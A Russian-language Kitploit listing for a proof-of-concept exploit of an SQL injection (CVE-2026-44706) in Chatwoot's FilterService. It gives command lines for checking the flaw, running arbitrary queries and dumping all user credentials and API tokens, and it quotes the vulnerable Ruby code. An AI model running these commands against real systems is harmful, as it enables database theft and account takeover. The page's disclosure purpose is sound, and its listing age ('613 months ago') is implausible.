Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2026-44706 — Chatwoot SQL-инъекция в FilterService | Kitploit
Инструменты/GitHubGitHub/hakaioffsec/cve-2026-44706
Анализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеАутентификацияОбучение и ОбразованиеБезопасность Баз Данных
GitHubhakaioffsec/cve-2026-44706

CVE-2026-44706

Chatwoot SQL-инъекция в FilterService

Репозиторий
613 месяцев назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

SQL-инъекция в Chatwoot FilterService

Эксплойт proof-of-concept для CVE-2026-44706 — уязвимости SQL-инъекции в FilterService#lt_gt_filter_values чат-бота Chatwoot, которая позволяет любому аутентифицированному агенту прочитать всю базу данных PostgreSQL, включая учётные данные пользователей и токены API. Прочитайте полную статью здесь.

Использование:

root@kitploit:~
# Verify injection (boolean-based)
$ python3 poc.py --url http://TARGET --token TOKEN --account-id 1 --mode check

# Time-based confirmation
$ python3 poc.py --url http://TARGET --token TOKEN --account-id 1 --mode timebased

# Extract arbitrary SQL query result
$ python3 poc.py --url http://TARGET --token TOKEN --account-id 1 --mode extract --query "SELECT version()"

# Dump all user credentials and API tokens
$ python3 poc.py --url http://TARGET --token TOKEN --account-id 1 --mode creds

Уязвимые версии

  • Chatwoot ≤ 4.11.1

Причина уязвимости

В app/services/filter_service.rb (строка 91) пользовательский ввод напрямую интерполируется в SQL без параметризации:

root@kitploit:~
def lt_gt_filter_values(query_hash)
  value = query_hash['values'][0]          # ← user input, no sanitization
  operator = query_hash['filter_operator'] == 'is_less_than' ? '<' : '>'
  "#{operator} '#{value}'::#{attribute_data_type}"   # ← raw interpolation
end

Все остальные операторы в этом классе используют привязку параметров (:value_N). Уязвимы только is_greater_than и is_less_than.

Затронутые конечные точки

  • POST /api/v1/accounts/:id/conversations/filter
  • POST /api/v1/accounts/:id/contacts/filter

Воздействие

CWE-89 SQL-инъекция. Любой аутентифицированный агент/администратор может:

  • Прочитать всю базу данных: пользователи, сообщения, токены, данные между учётными записями
  • Похитить учётные данные: хэши bcrypt для офлайн-взлома
  • Похитить токены API: выдать себя за любого пользователя, включая суперадминистраторов
  • DoS: pg_sleep() для исчерпания соединений с базой данных

CVSS

8.8 Высокий CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Отказ от ответственности

Этот инструмент предназначен только для образовательных и исследовательских целей. Используйте его только в системах, которыми вы владеете или на тестирование которых у вас есть явное разрешение. Автор не несёт ответственности за любое неправомерное использование или ущерб, причинённый этой программой.

QuimeraX Intelligence

QuimeraX Intelligence — это продвинутая платформа EASM и Cyber Threat Intelligence, специализирующаяся на выявлении критических уязвимостей в сложных системах. Платформа активно мониторит, обнаруживает и оповещает клиентов об угрозах безопасности, обеспечивая прозрачность и быструю реакцию на потенциальные риски. Клиенты получают немедленные уведомления и подробные отчёты, если их системы оказываются уязвимыми, что позволяет им принять защитные меры. узнать больше

Hakai Security

Hakai Security — это компания по кибербезопасности, основанная профессионалами в области безопасности, приверженная техническому совершенству. Мы предлагаем индивидуальные решения по безопасности, включая продвинутое тестирование на проникновение, реалистичные симуляции Red Team и практики безопасной разработки, чтобы активно защищать активы наших клиентов от развивающихся киберугроз.

Hacking Club

Hacking Club — это обучающая платформа, где вы изучаете кибербезопасность с помощью практических уроков, лабораторных работ и заданий, созданных экспертами из нашей консалтинговой фирмы по безопасности: прямо с поля боя к вашему обучению. Практикуйтесь в уязвимости, представленной в этом репозитории от hacking club! узнать больше

Скачать инструмент